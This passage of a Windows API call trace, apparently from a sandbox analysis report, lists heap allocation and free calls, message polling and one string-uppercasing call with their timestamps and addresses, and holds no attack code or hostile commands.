returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0176.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0176.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0176.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.584] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0176.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0176.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0176.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0176.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0176.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0176.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0176.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0176.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0176.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.584] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0176.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0176.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0176.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0176.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.588] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0176.588] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0176.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0176.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0176.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0176.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0176.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0176.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0176.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0176.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0176.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0176.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0176.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd468 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0176.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0176.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0176.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0176.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0176.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0176.590] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0176.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0176.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0176.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0176.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0176.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0176.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0176.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0176.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0176.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0176.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0176.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0176.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0176.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0176.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0176.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0176.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0176.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0176.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 